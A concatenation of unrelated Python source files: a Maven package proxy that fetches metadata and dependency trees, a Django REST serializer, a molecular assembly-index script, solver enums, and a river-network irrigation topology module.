versions_url = "https://repo1.maven.org/maven2/%s/%s/maven-metadata.xml" % (gid.replace('.', '/'), aid)
versions_content = requests.request('GET', versions_url)
# Parsing pom files
# https://stackoverflow.com/questions/16802732/reading-maven-pom-xml-in-python
return fromstring(versions_content.text)
except:
logging.error("fail to get latest version for pkg %s!", pkg_name)
return None
def _get_latest_version(self, pkg_name):
versions_info = self._get_versions_info(pkg_name=pkg_name)
if versions_info:
return versions_info.find('./versioning/latest').text
else:
return None
def _get_sanitized_version(self, pkg_name, pkg_version):
if pkg_version is None:
return self._get_latest_version(pkg_name=pkg_name)
else:
return pkg_version
def _get_pkg_fname(self, pkg_name, pkg_version, suffix='jar'):
_, aid = pkg_name.split('/')
return '%s-%s.%s' % (aid, pkg_version, suffix)
def _get_pkg_dir(self, pkg_name, pkg_version):
gid, aid = pkg_name.split('/')
return '%s/%s/%s' % (gid.replace('.', '/'), aid, pkg_version)
def _get_pkg_path(self, pkg_name, pkg_version, suffix='jar'):
return '%s/%s' % (self._get_pkg_dir(pkg_name=pkg_name, pkg_version=pkg_version),
self._get_pkg_fname(pkg_name=pkg_name, pkg_version=pkg_version, suffix=suffix))
def download(self, pkg_name, pkg_version=None, outdir=None, binary=False, with_dep=False):
# mvn dependency:get -Dartifact=com.google.protobuf:protobuf-java:3.5.1 -Dtransitive=false -Ddest=/tmp/
pkg_version = self._get_sanitized_version(pkg_name=pkg_name, pkg_version=pkg_version)
if binary:
logging.warning("support for binary downloading is not added yet!")
if with_dep:
logging.warning("support for packing dependencies is not added yet!")
possible_extensions = ('jar', 'aar', 'war')
for extension in possible_extensions:
# /tmp/protobuf-java-3.5.1.jar
if extension != 'jar':
download_artifact = '%s:%s:%s' % (pkg_name.replace('/', ':'), pkg_version, extension)
else:
download_artifact = '%s:%s' % (pkg_name.replace('/', ':'), pkg_version)
download_cmd = ['mvn', 'dependency:get',
'-Dartifact=%s' % download_artifact, '-Dtransitive=false', '-Ddest=%s' % outdir]
exec_command('mvn dependency:get', download_cmd)
# cleanup intermediate folders
temp_install_path = expanduser(join('~/.m2/repository', self._get_pkg_dir(pkg_name=pkg_name, pkg_version=pkg_version)))
shutil.rmtree(temp_install_path)
# check if download path exists to see if the download is successful or not
download_path = join(outdir, self._get_pkg_fname(pkg_name=pkg_name, pkg_version=pkg_version, suffix=extension))
if exists(download_path):
return download_path
logging.error("failed to download pkg %s ver %s", pkg_name, pkg_version)
return None
def install(self, pkg_name, pkg_version=None, trace=False, trace_string_size=1024, install_dir=None, outdir=None,
sudo=False):
# mvn dependency:get -Dartifact=com.google.protobuf:protobuf-java:3.5.1
install_cmd = ['mvn', 'dependency:get', '-Dartifact=%s:%s' % (
pkg_name.replace('/', ':'), self._get_sanitized_version(pkg_name=pkg_name, pkg_version=pkg_version))]
install_cmd = self.decorate_strace(pkg_name=pkg_name, pkg_version=pkg_version, trace=trace,
trace_string_size=trace_string_size, sudo=sudo, outdir=outdir,
command=install_cmd)
# ~/.m2/repository/com/google/protobuf/protobuf-java/3.5.1/protobuf-java-3.5.1.jar
exec_command('mvn install', install_cmd)
    def install_file(self, infile, trace=False, trace_string_size=1024, sudo=False, install_dir=None, outdir=None):
        # FIXME: add install using local jar file
        # mvn install -Dxxxxx
        # Not implemented: logs an error and returns None.
        logging.error("suport for install_file is not added yet!")
def uninstall(self, pkg_name, pkg_version=None, trace=False, trace_string_size=1024, sudo=False, install_dir=None,
outdir=None):
# simply remove the corresponding folder
# https://stackoverflow.com/questions/15358851/how-to-remove-jar-file-from-local-maven-repository-which-was-added-with-install/15358921
install_path = expanduser(join('~/.m2/repository', self._get_pkg_dir(
pkg_name=pkg_name, pkg_version=self._get_sanitized_version(pkg_name=pkg_name, pkg_version=pkg_version))))
shutil.rmtree(install_path)
    def get_metadata(self, pkg_name, pkg_version=None):
        """Return the parsed POM element for a package version, caching on disk.

        Serves a cached copy from the pkg-info dir when available; otherwise
        fetches the POM from Maven Central and caches it. Returns None on
        failure.
        """
        # load cached metadata information
        pkg_info_dir = self.get_pkg_info_dir(pkg_name=pkg_name)
        if pkg_info_dir is not None:
            metadata_fname = self.get_metadata_fname(pkg_name=pkg_name, pkg_version=pkg_version,
                                                     fmt=self.metadata_format)
            metadata_file = join(pkg_info_dir, metadata_fname)
            if exists(metadata_file):
                logging.warning("get_metadata: using cached metadata_file %s!", metadata_file)
                if self.metadata_format == 'pom':
                    return fromstring(open(metadata_file, 'r').read())
                else:
                    logging.error("get_metadata: output format %s is not supported!", self.metadata_format)
                    return None
        # Maven metadata is loaded in two steps.
        # First, load names and versions. Then load the latest/specified version
        try:
            # Maven URL for specific version
            # https://repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.6.1/protobuf-java-3.6.1.pom
            # NOTE: don't re-assign variable pkg_version here, since it is used to generated file name later.
            metadata_url = "https://repo1.maven.org/maven2/%s" % self._get_pkg_path(
                pkg_name=pkg_name, pkg_version=self._get_sanitized_version(pkg_name=pkg_name, pkg_version=pkg_version),
                suffix="pom")
            metadata_content = requests.request('GET', metadata_url)
            pkg_info = fromstring(metadata_content.text)
        except Exception as e:
            logging.error("fail in get_metadata for pkg %s: %s, ignoring!", pkg_name, str(e))
            return None
        if pkg_info_dir is not None:
            if not exists(pkg_info_dir):
                os.makedirs(pkg_info_dir)
            metadata_fname = self.get_metadata_fname(pkg_name=pkg_name, pkg_version=pkg_version,
                                                     fmt=self.metadata_format)
            metadata_file = join(pkg_info_dir, metadata_fname)
            if self.metadata_format == 'pom':
                # cache the raw POM text for the next call
                open(metadata_file, 'w').write(metadata_content.text)
            else:
                logging.error("get_metadata: output format %s is not supported!", self.metadata_format)
        return pkg_info
def get_versions(self, pkg_name, max_num=15, min_gap_days=30, with_time=False):
# FIXME: the max_num and min_gap_days are not checked and enforced!
# https://repo1.maven.org/maven2/com/google/protobuf/protobuf-java/maven-metadata.xml
versions_info = self._get_versions_info(pkg_name=pkg_name)
if versions_info is None:
logging.error("fail to get versions_info for %s", pkg_name)
return []
versions = [ver.text for ver in versions_info.findall('./versioning/versions/version')]
# NOTE: this is similar to filter_versions, except that no date information.
if len(versions) <= max_num:
return versions
versions = filter(lambda k: k.strip('v').replace('.', '').isdigit(), versions)
if len(versions) == 0:
return []
if max_num <= 0:
return versions
else:
return sorted(versions, key=lambda version: map(lambda digit: int(digit) if digit else 0, version.strip('v').split('.')), reverse=True)[:max_num]
def get_author(self, pkg_name):
pkg_info = self.get_metadata(pkg_name=pkg_name)
if pkg_info is None:
return {}
groupid = pkg_name.split('/')[0]
# developers
# e.g. org.clojure..tools.logging, org.twitter4j..twitter4j
# https://stackoverflow.com/questions/16802732/reading-maven-pom-xml-in-python
nsmap = {'m': 'http://maven.apache.org/POM/4.0.0'}
devs = pkg_info.findall('.//m:developer', nsmap)
developers = []
for dev in devs:
dev_info = {}
dev_id = dev.find('m:id', nsmap)
if dev_id is not None:
dev_info['id'] = dev_id.text
dev_name = dev.find('m:name', nsmap)
if dev_name is not None:
dev_info['name'] = dev_name.text
dev_email = dev.find('m:email', nsmap)
if dev_email is not None:
dev_info['email'] = dev_email.text
developers.append(dev_info)
return {'groupid': groupid, 'developers': developers}
def get_version_hash(self, pkg_name, pkg_version, algorithm='sha1'):
if algorithm not in ('sha1', 'md5'):
raise Exception("algorithm %s is not supported!" % algorithm)
# Check the md5 for jar file of the package version.
# https://repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.5.1/protobuf-java-3.5.1.jar.md5
gid, aid = pkg_name.split('/')
possible_extensions = ['jar', 'aar', 'war']
version_hash = None
for extension in possible_extensions:
try:
version_hash_url = "https://repo1.maven.org/maven2/%s/%s/%s/%s" % (
gid.replace('.', '/'), aid, pkg_version, self._get_pkg_fname(
pkg_name=pkg_name, pkg_version=pkg_version, suffix="%s.%s" % (extension, algorithm)))
version_response = requests.request('GET', version_hash_url)
if not version_response.ok:
raise Exception("URL not valid for extension %s!" % extension)
# sometimes the link only contains hash value
# https://repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.5.1/protobuf-java-3.5.1.jar.sha1
# sometimes the link contains both hash value and the file path
# http://repo1.maven.org/maven2/maven/maven-gump-plugin/2.0.1/maven-gump-plugin-2.0.1.jar.sha1
version_hash = version_response.text.split(' ')[0]
break
except Exception as e:
logging.warning("cannot get_version_hash for extension %s for pkg %s ver %s: %s",
extension, pkg_name, pkg_version, str(e))
if not version_hash:
logging.error("fail in get_version_hash for pkg %s ver %s, ignoring!", pkg_name, pkg_version)
return None
return version_hash
    def get_dep(self, pkg_name, pkg_version=None, flatten=False, cache_only=False):
        """Return the dependencies of a Maven package version.

        Runs ``mvn dependency:tree`` against the package's POM in a temporary
        directory and parses its text output. Direct dependencies are recorded
        in ``dep_pkgs``; direct plus transitive ones in ``flatten_dep_pkgs``
        (both ``{"groupId/artifactId": version}``). Results are cached as JSON
        in the package info dir when one is available.

        Returns ``flatten_dep_pkgs`` if *flatten*, else ``dep_pkgs``; returns
        None when *cache_only* is set and no usable cache exists, or when the
        configured dep format is unsupported.
        """
        super(MavenProxy, self).get_dep(pkg_name=pkg_name, pkg_version=pkg_version, flatten=flatten,
                                        cache_only=cache_only)
        # load cached dependency information
        pkg_info_dir = self.get_pkg_info_dir(pkg_name=pkg_name)
        if pkg_info_dir is not None:
            if flatten:
                dep_fname = self.get_flatten_dep_fname(pkg_name=pkg_name, pkg_version=pkg_version, fmt=self.dep_format)
            else:
                dep_fname = self.get_dep_fname(pkg_name=pkg_name, pkg_version=pkg_version, fmt=self.dep_format)
            dep_file = join(pkg_info_dir, dep_fname)
            if exists(dep_file):
                logging.warning("get_dep: using cached dep_file %s!", dep_file)
                if self.dep_format == 'json':
                    try:
                        return json.load(open(dep_file, 'r'))
                    except:
                        # corrupt or partial cache entry: fall through and regenerate
                        logging.debug("fail to load dep_file: %s, regenerating!", dep_file)
                else:
                    logging.error("get_dep: output format %s is not supported!", self.dep_format)
                    return None
        if cache_only:
            return None
        # use maven dependency to get the dependencies
        temp_repo_dir = tempfile.mkdtemp(prefix='get_dep-')
        # https://stackoverflow.com/questions/3342908/how-to-get-a-dependency-tree-for-an-artifact
        # http://maven.apache.org/plugins/maven-dependency-plugin/tree-mojo.html
        dep_pkgs = {}
        flatten_dep_pkgs = {}
        try:
            pom_filename = 'pom.xml'
            dep_tree_filename = 'dep_tree.txt'
            metadata_file = self.get_metadata_file(pkg_name=pkg_name, pkg_version=pkg_version)
            shutil.copy(metadata_file, join(temp_repo_dir, pom_filename))
            get_dep_cmd = ['mvn', 'dependency:tree', '-DoutputFile=%s' % dep_tree_filename, '-DoutputType=text']
            exec_command('mvn dependency:tree', get_dep_cmd, cwd=temp_repo_dir)
            dep_tree_file = join(temp_repo_dir, dep_tree_filename)
            for line in open(dep_tree_file, 'r'):
                line = line.strip('\n')
                if not line:
                    continue
                # the number of space-separated parts reflects tree depth:
                # 2 parts -> direct dependency, more -> transitive dependency
                line_parts = line.split(' ')
                if len(line_parts) <= 1:
                    # the root artifact line, not a dependency
                    continue
                elif len(line_parts) == 2:
                    # coordinate format: groupId:artifactId:packaging:version:scope
                    dep_pkg_info = line_parts[-1].split(':')
                    if len(dep_pkg_info) != 5:
                        logging.error("pkg %s has dependency with unexpected format: %s", pkg_name, line)
                    gid, aid, _, vid, dep_type = dep_pkg_info
                    # TODO: do we want compile dependency or test dependency (dep_type), currently recording both
                    dep_name = '%s/%s' % (gid, aid)
                    dep_pkgs[dep_name] = vid
                    flatten_dep_pkgs[dep_name] = vid
                else:
                    # transitive dependency: recorded only in the flattened map
                    dep_pkg_info = line_parts[-1].split(':')
                    if len(dep_pkg_info) != 5:
                        logging.error("pkg %s has indirect dependency with unexpected format: %s", pkg_name, line)
                    gid, aid, _, vid, dep_type = dep_pkg_info
                    dep_name = '%s/%s' % (gid, aid)
                    flatten_dep_pkgs[dep_name] = vid
        except Exception as e:
            logging.error("failed while getting dependencies (%s) for pkg %s: %s!", flatten_dep_pkgs, pkg_name, str(e))
        logging.warning("%s has %d deps and %d flatten deps", pkg_name, len(dep_pkgs), len(flatten_dep_pkgs))
        if pkg_info_dir is not None:
            if not exists(pkg_info_dir):
                os.makedirs(pkg_info_dir)
            dep_fname = self.get_dep_fname(pkg_name=pkg_name, pkg_version=pkg_version, fmt=self.dep_format)
            dep_file = join(pkg_info_dir, dep_fname)
            flatten_dep_fname = self.get_flatten_dep_fname(pkg_name=pkg_name, pkg_version=pkg_version, fmt=self.dep_format)
            flatten_dep_file = join(pkg_info_dir, flatten_dep_fname)
            if self.dep_format == 'json':
                json.dump(dep_pkgs, open(dep_file, 'w'), indent=2)
                json.dump(flatten_dep_pkgs, open(flatten_dep_file, 'w'), indent=2)
            else:
                logging.error("get_dep: output format %s is not supported!", self.dep_format)
        # remove the repo directory
        shutil.rmtree(temp_repo_dir)
        return flatten_dep_pkgs if flatten else dep_pkgs
def install_dep(self, pkg_name, pkg_version=None, trace=False, trace_string_size=1024, sudo=False, install_dir=None,
outdir=None):
# TODO: currently dependencies are installed one by one, improve it to be installed in one command!
# Invoke install iteratively to install all the dependencies
dep_pkgs = self.get_dep(pkg_name=pkg_name, pkg_version=pkg_version)
# mvn dependency:get -Dartifact=org.apache.kafka:kafka_2.11:2.0.0
# mvn dependency:get -Dartifact=com.google.protobuf:protobuf-java:3.5.1
for dep_name, dep_version in dep_pkgs.items():
self.install(pkg_name=dep_name, pkg_version=dep_version, trace=trace, trace_string_size=trace_string_size,
sudo=sudo, outdir=outdir)
    def has_install(self, pkg_name, pkg_version=None, binary=False, with_dep=False):
        # Maven packages are always treated as installable; no check is performed.
        return True
    def test(self, pkg_name, pkg_version=None, trace=False, trace_string_size=1024, sudo=False, install_dir=None,
             outdir=None, timeout=None):
        # Not implemented for Maven packages.
        pass
    def has_test(self, pkg_name, pkg_version=None, binary=False, with_dep=False):
        # Testing is not supported for Maven packages (see test() above).
        return False
    def main(self, pkg_name, pkg_version=None, trace=False, trace_string_size=1024, sudo=False, install_dir=None,
             outdir=None, timeout=None):
        # Not implemented for Maven packages.
        pass
    def has_main(self, pkg_name, pkg_version=None, binary=False, with_dep=False):
        # Running a main entry point is not supported for Maven packages.
        return False
    def exercise(self, pkg_name, pkg_version=None, trace=False, trace_string_size=1024, sudo=False, install_dir=None,
                 outdir=None, timeout=None):
        # Not implemented for Maven packages.
        pass
    def has_exercise(self, pkg_name, pkg_version=None, binary=False, with_dep=False):
        # Exercising is not supported for Maven packages (see exercise() above).
        return False
|
from django.utils.text import slugify
from rest_framework import serializers
from fragments.models import Post, Fragment
class FragmentSerializer(serializers.ModelSerializer):
    """
    Serializer for Fragment instances
    """
    class Meta:
        model = Fragment
        fields = (
            'post',
            'fragment_type',
            'order',
            'content',
            'is_sanitized',
            'credit',
            'caption',
            'language',
            'embed_type',
            'created',
            'updated',
        )
        # BUG FIX: DRF's Meta option is ``read_only_fields`` (plural).
        # The original ``read_only_field`` was silently ignored, so
        # 'created'/'updated' were never actually marked read-only.
        read_only_fields = (
            'created',
            'updated',
        )
class PostSerializer(serializers.ModelSerializer):
    """
    Serializer for Post instances
    """
    fragments = FragmentSerializer(many=True, required=False)

    class Meta:
        model = Post
        fields = (
            'title',
            'slug',
            'tldr',
            'author',
            'fragments',
            'org',
            'created',
            'updated',
        )
        # BUG FIX: DRF's Meta option is ``read_only_fields`` (plural);
        # the original ``read_only_field`` was silently ignored.
        read_only_fields = (
            'created',
            'updated',
        )
        extra_kwargs = {
            'slug': {'required': False}
        }

    def validate(self, attrs):
        """Cross-field validation: the author must belong to the post's
        organization, and a missing slug is derived from the title."""
        author = attrs.get('author')
        org = attrs.get('org')
        if author and org:
            if not org.is_member(author):
                raise serializers.ValidationError({
                    'organization': 'Author is not part of organization: %s' % (
                        org.name)
                })
        title = attrs.get('title')
        slug = attrs.get('slug')
        if title and not slug:
            # NOTE(review): ``unicode`` exists only on Python 2 -- this raises
            # NameError on Python 3. Confirm the runtime, or switch to str().
            attrs['slug'] = slugify(unicode(title))
        return attrs
|
import assemblycalculator as ac
import multiprocessing as mp
import pickle
import pandas as pd
import os
def calculate_assembly_MC(inchi):
    """ Calculate the assembly value of an inchi string using the monteCarlo assembly method

    Args:
        inchi (string): inchi representation of the SureChemBL compound

    Returns:
        dict: the inchi and its Monte Carlo assembly index ("ai")
    """
    # 120s timeout; histogram/sampling sizes are fixed tuning parameters of
    # the Monte Carlo estimator.
    ai = ac.calculate_ma(inchi,
                         120,
                         "monte-carlo",
                         num_frags_hist=10000,
                         path_samples=20000)
    return {"inchi": inchi, "ai": ai}
def calculate_assembly_fragment(inchi):
    """ Calculate the assembly value of an inchi string using the fragment assembly method

    Used for compounds whose Monte Carlo estimate is large (>= 40), where the
    fragment method gives a better approximation.

    Args:
        inchi (string): inchi representation of the SureChemBL compound

    Returns:
        dict: the inchi and its fragment-method assembly index ("ai")
    """
    ai = ac.calculate_ma(inchi, method="fragment", timeout=300)
    return {"inchi": inchi, "ai": ai}
def read_cpds(fp):
    """ Read inchi compounds from a csv file

    Args:
        fp (string): relative file path to a csv file with SureChemBL cpd data

    Returns:
        list: every InChI string contained in the file's "InChI" column
    """
    frame = pd.read_csv(fp)
    return frame["InChI"].tolist()
def get_changing_percentileFiles(side, precision):
    """ Find the csv files which correspond to change percentiles

    Args:
        side (string): min/max, referring to the largest negative/positive changes
        precision (string): string representation of percentile precision

    Returns:
        list: file names under Data/Cpd_Data/ matching the naming scheme
    """
    prefix = "ids_change_" + side + "Percentile_" + precision
    return [name for name in os.listdir("Data/Cpd_Data/")
            if name.startswith(prefix) and name.endswith(".csv")]
def get_top_percentileFiles():
    """ Return the files for compounds above the 99.99th percentile
    of total attachment values

    Returns:
        list: matching file names under Data/Cpd_Data/
    """
    return [name for name in os.listdir("Data/Cpd_Data/")
            if name.startswith("ids_above99_99percentile")]
def calculate_MAs(files):
    """ Wrapper function for MA calculation

    Args:
        files (list): list of csv files (under Data/Cpd_Data/) with compound data

    Returns:
        None; writes a pickle per input file linking inchis with assembly values

    FIX: the pickle output file handle was never closed; now closed via ``with``.
    """
    for f in files:
        cpds = read_cpds("Data/Cpd_Data/" + f)
        # Set up parallelization - a bit of overhead for setting it up, but that's fine
        pool = mp.Pool(64)
        # Calculate assembly values using the Monte Carlo method
        assemblies = pool.map(calculate_assembly_MC, cpds)
        pool.close()
        with open("Data/Cpd_Data/" + f[:-4] + "_assembly.p", "wb") as out:
            pickle.dump(assemblies, out)
def calculate_largeMAs(f):
    """ Recalculate the MA of compounds with a Monte Carlo value >= 40 using
    the "fragment" method - also a rough approximation, but better for large values

    Args:
        f (string): pickle file (under Data/Cpd_Data/) of {"inchi", "ai"} dicts

    FIXES: ``pool.close`` was missing its call parentheses (the pool was never
    closed); pickle file handles were never closed (now use ``with``).
    """
    with open("Data/Cpd_Data/" + f, "rb") as fh:
        data = pickle.load(fh)
    # keep only the compounds whose MC estimate is large
    large_MA_cpds = [cpd["inchi"] for cpd in data if cpd["ai"] >= 40]
    print("----- " + f + " -----")
    print(large_MA_cpds)
    print()
    pool = mp.Pool(64)
    assemblies = pool.map(calculate_assembly_fragment, large_MA_cpds)
    pool.close()  # BUG FIX: was ``pool.close`` (attribute access, a no-op)
    # f ends in ".p", so f[:-2] strips the extension before adding the suffix
    with open("Data/Cpd_Data/" + f[:-2] + "_large.p", "wb") as out:
        pickle.dump(assemblies, out)
def main():
    """ Steps
    1. Read in compounds from a specific file
    2. MC assembly algorithm
    3. Save calculations using name + "assembly" - link inchi & MA
    4. Link assembly values to csv file (eventually, probably do this in a separate script)

    Other modes (currently disabled): run calculate_MAs() over
    get_changing_percentileFiles(side, precision) for the smallest/largest
    change values, or over get_top_percentileFiles() for top attachment values.
    """
    five_year_bins = [(1980, 1984), (1985, 1989), (1990, 1994), (1995, 1999),
                      (2000, 2004), (2005, 2009), (2010, 2014), (2015, 2019)]
    for first_year, last_year in five_year_bins:
        target = ("ids_above99_99percentile" + str(first_year) + "_" +
                  str(last_year) + "cpdData_assembly.p")
        calculate_largeMAs(target)
# Run only when executed as a script (required for multiprocessing safety,
# since this module spawns worker pools).
if __name__ == "__main__":
    main()
|
from enum import Enum, IntEnum
class Axe(IntEnum):
    """Cartesian axis indices; usable directly as integer array indices."""
    X = 0
    Y = 1
    Z = 2
class OdeSolver(Enum):
    """
    The four available ODE solving strategies.
    RK is pretty much a good balance.
    """
    COLLOCATION = 0
    RK = 1
    CVODES = 2
    NO_SOLVER = 3
class Instant(Enum):
    """
    The five selectable groups of nodes.
    START: first node only.
    MID: middle node only.
    INTERMEDIATES: all nodes except first and last.
    END: last node only.
    ALL: obvious.
    """
    START = "start"
    MID = "mid"
    INTERMEDIATES = "intermediates"
    END = "end"
    ALL = "all"
|
"""
Utils and functions to determine irrigation topology
Inne Vanderkelen - March 2021
"""
# import modules
import pfaf.pfafstetter as pfaf # decode package from Naoki, see https://github.com/nmizukami/pfaf_decode
import pandas as pd
import numpy as np
import geopandas as gpd
###################
# 1. Helper functions
def get_mainstream(pfafs, pfaf_outlet):
    """Return the pfaf codes in *pfafs* that lie on the mainstream of *pfaf_outlet*.

    A segment is on the mainstream when pfaf.get_tributary reports the
    sentinel '-999' (i.e. it belongs to no tributary).
    """
    return [code for code in pfafs if pfaf.get_tributary(code, pfaf_outlet) == '-999']
def get_downstream_PFAF(river_shp):
    """Get the PFAF code of the directly downstream segment for every segment.

    Input: dataframe of river segments with 'PFAF', 'seg_id' and 'Tosegment'.
    Output: dataframe with columns ['PFAF', 'PFAF_downstream'] (NaN where no
    downstream segment exists).
    """
    lookup = river_shp[['PFAF', 'seg_id']].rename(
        columns={'seg_id': 'Tosegment', 'PFAF': 'PFAF_downstream'})
    merged = river_shp.merge(lookup[['PFAF_downstream', 'Tosegment']],
                             on='Tosegment', how='left')
    return merged[['PFAF', 'PFAF_downstream']]
def get_pfafs_start2end(pfaf_start, pfaf_end, river_shp, include_end=True):
    """Get the pfafs of the stream network from pfaf_start down to pfaf_end.

    NOTE(review): ``include_end=False`` removes the *start* segment from the
    result (despite the parameter name) -- callers use it to drop the
    reservoir segment itself; confirm this is the intended semantics.
    Also note: if the chain never reaches pfaf_end this loops forever.
    """
    # lookup table: PFAF -> directly downstream PFAF
    lookup = get_downstream_PFAF(river_shp)
    chain = [pfaf_start]
    current = pfaf_start
    downstream = pfaf_start
    # walk downstream until the end segment is appended
    while downstream != pfaf_end:
        if (lookup['PFAF'] == current).sum() > 0:
            downstream = lookup.loc[lookup['PFAF'] == current, 'PFAF_downstream'].values[0]
            chain.append(downstream)
            current = downstream
    if not include_end:
        chain.remove(pfaf_start)
    return chain
def get_streamlength_total(pfaf_start, pfaf_end, river_shp):
    """Get river stream length between start and end pfaf, including both
    endpoint segments.

    Input: start and end pfaf code, df with river network (pfaf, to_segment, length).
    """
    segment_codes = get_pfafs_start2end(pfaf_start, pfaf_end, river_shp)
    on_path = river_shp['PFAF'].isin(segment_codes)
    return river_shp.loc[on_path, 'Length'].sum()
###################
# 2. Functions to select reservoir pfafs and corresponding outlets
def get_pfafs_res(river_shp):
    """Return the list of reservoir pfaf codes, selected where islake == 1
    (to be replaced with a proper reservoir flag!!)."""
    is_reservoir = river_shp['islake'] == 1
    return list(river_shp.loc[is_reservoir, 'PFAF'].values)
def get_outlets(river_shp, pfaf_reservoirs, threshold):
    """Get pfafstetter codes of outlets (end of influence where reservoir serves)
    based on:  1. river mouth is reached (there is no downstream pfaf code)
               2. Next reservoir on stream network is reached
               3. length threshold is exceeded (only include segments within threshold)
    input: gdf of river shps, list of pfaf codes of reservoirs and length threshold (in m)
    output: list of outlets corresponding to reservoir list
    """
    import math
    pfaf_outlets = []
    count = 1
    print('-------- Searching for outlets --------')
    print('')
    for pfaf_res in pfaf_reservoirs:
        print('processing '+str(count)+ ' of '+str(len(pfaf_reservoirs)))
        print('reservoir: '+pfaf_res)
        # lookup table: PFAF -> directly downstream PFAF (NaN at the mouth)
        downstream_lookup = get_downstream_PFAF(river_shp)
        # initialise the walk at the reservoir segment
        pfaf_current = pfaf_res
        total_length = 0
        outlet_found = False
        # travel downstream from reservoir pfaf to identify outlet (end of reservoir influence)
        while not outlet_found:
            # next downstream segment
            pfaf_down = downstream_lookup[downstream_lookup['PFAF']==pfaf_current]['PFAF_downstream'].values[0]
            # the reservoir segment itself has no downstream (NaN lookup)
            if math.isnan(float(pfaf_down)):
                pfaf_outlet = pfaf_current
                outlet_found = True
                print('reservoir has no downstream')
            else:
                # add length of downstream segment to the accumulated length
                total_length = total_length + river_shp[river_shp['PFAF']==pfaf_down]['Length'].values[0]
                # condition 1: pfaf_down is the river mouth (nothing downstream of it)
                if math.isnan(float(downstream_lookup[downstream_lookup['PFAF']==pfaf_down]['PFAF_downstream'].values[0])):
                    print('river mouth reached')
                    print('')
                    pfaf_outlet = pfaf_down
                    outlet_found = True
                # condition 2: pfaf_down is another reservoir
                elif pfaf_down in pfaf_reservoirs:
                    print('reservoir reached')
                    print('')
                    pfaf_outlet = pfaf_down
                    outlet_found = True
                # condition 3: length threshold exceeded by the downstream
                # segment, so the current segment is the outlet
                elif total_length > threshold:
                    print('length threshold exceeded')
                    print('')
                    pfaf_outlet = pfaf_current
                    outlet_found = True
                # otherwise keep moving downstream
                else:
                    pfaf_current = pfaf_down
        pfaf_outlets.append(pfaf_outlet)
        count = count+1
    print('---------- All outlets found! ----------')
    return pfaf_outlets
###################
# 3. Functions to determine conditions for topology selection
def get_pfaf_betweenres(pfaf_res, pfaf_outlet, all_pfafs, include_end=True):
    """
    Return the pfaf codes from *all_pfafs* located between pfaf_res (upper)
    and pfaf_outlet (lower): the outlet's subbasin minus everything upstream
    of (or equal to) the reservoir. When *include_end* the reservoir segment
    itself is appended.
    """
    # subbasin draining through the outlet
    subbasin = pfaf.get_subbasin(all_pfafs, pfaf_outlet, include_closed=False)
    # keep only reaches downstream of the reservoir (and not the reservoir itself)
    between = [code for code in subbasin
               if not pfaf.check_upstream(code, pfaf_res) and code != pfaf_res]
    if include_end:
        between.append(pfaf_res)
    return between
def exclude_higher_botelev(pfafs, pfaf_res, seg_topo):
    """ Exclude segments whose bottom elevation is at or above the reservoir's.

    input:  pfafs:    list with all candidate segment codes
            pfaf_res: reservoir pfaf code
            seg_topo: (geo)pandas dataframe with BotElev and PFAF per segment
    output: pandas Series of pfaf codes strictly below the reservoir elevation
    """
    reservoir_elev = seg_topo.loc[seg_topo['PFAF'] == pfaf_res, 'BotElev'].values[0]
    keep = seg_topo.PFAF.isin(pfafs) & (seg_topo.BotElev < reservoir_elev)
    return seg_topo.loc[keep, 'PFAF']
def exclude_upstream_other_res(pfafs, pfaf_reservoirs):
    """
    Exclude segments upstream of other reservoirs, and the other reservoir
    segments themselves.

    input:  pfafs: current selection of pfafs; pfaf_reservoirs: all reservoir pfafs
    output: the input pfafs minus excluded ones (original order preserved)
    """
    # restrict to reservoirs actually present in the current network
    # (keeps the double loop below short)
    reservoirs_in_network = [res for res in pfaf_reservoirs if res in pfafs]
    # collect everything upstream of (or equal to) any of those reservoirs
    excluded = []
    for candidate in pfafs:
        for res in reservoirs_in_network:
            if pfaf.check_upstream(candidate, res) or candidate == res:
                excluded.append(candidate)
    return [code for code in pfafs if code not in excluded]
def godown_tributaries(tributary, tributaries_res, river_shp, length_trib, threshold):
    """Go down on tributaries and apply the length condition (recursive).

    Walks the sub-tributaries of *tributary*, appending segments whose
    accumulated stream length stays under *threshold* to *tributaries_res*
    (which is also mutated in place).

    output: list of dependent tributaries

    FIX: removed dead debug code -- ``if subtributary == '31249843'`` compared
    a list against a string (always False) and a commented-out print.
    """
    # lookup table: PFAF -> directly downstream PFAF
    downstream_lookup = get_downstream_PFAF(river_shp)
    # all sub-tributaries of the segment that flows into the reservoir stream
    all_subtributaries = pfaf.get_tributaries(tributary, 1)
    for i in range(1, len(all_subtributaries.keys())):
        pfaf_inresstream = list(all_subtributaries.keys())[i]
        # add segment to reservoir tributaries (served by reservoir)
        # HERE THE CONDITION of first tributary to main stem can be adjusted.
        tributaries_res.append(pfaf_inresstream)
        # go down in subtributaries and apply the threshold length condition
        subtributaries_considered = []
        for key in all_subtributaries[pfaf_inresstream].keys():
            subtributary = all_subtributaries[pfaf_inresstream][key]
            # does this sub-tributary flow into an already-selected segment?
            downstream_subtributary = downstream_lookup[downstream_lookup['PFAF'].isin(subtributary)]['PFAF_downstream'].values.tolist()
            intributary = [True for trib in downstream_subtributary if trib in tributaries_res]
            if (subtributary not in subtributaries_considered) and (intributary):
                if len(subtributary) == 1:
                    length_trib_withsubtrib1 = length_trib + river_shp.loc[river_shp['PFAF'] == subtributary[0], 'Length'].values[0]
                    if length_trib_withsubtrib1 < threshold:
                        tributaries_res.append(subtributary[0])
                        # also include the paired upstream segment (part of the
                        # sub-tributary main stream), if it exists
                        tributary_upstream = str(int(subtributary[0]) + 1)
                        if (tributary_upstream in river_shp['PFAF'].values):
                            length_trib_withsubtrib2 = length_trib + river_shp.loc[river_shp['PFAF'] == tributary_upstream, 'Length'].values[0]
                            if (length_trib_withsubtrib2 < threshold):
                                tributaries_res.append(tributary_upstream)
                        # NOTE(review): this early return skips any remaining
                        # sub-tributaries of this branch -- confirm intended.
                        return tributaries_res
                else:
                    # recurse into the multi-segment sub-tributary
                    tributaries_res = godown_tributaries(subtributary, tributaries_res, river_shp, length_trib, threshold)
                # save considered tributaries so we do not loop over them twice
                subtributaries_considered.append(subtributary)
    return tributaries_res
# this function replaces the get_pfaf_between_res
def get_pfaf_resstream_and_in_tributary_threshold(pfaf_res, pfaf_outlet, river_shp, threshold):
    """ get reservoir stream and all tributaries on threshold distance from reservoir main stream
    input:  pfaf_res, pfaf_outlet, river_shp, threshold
    output: tributaries_res: list with all pfafs that are on mainstream or on tributary
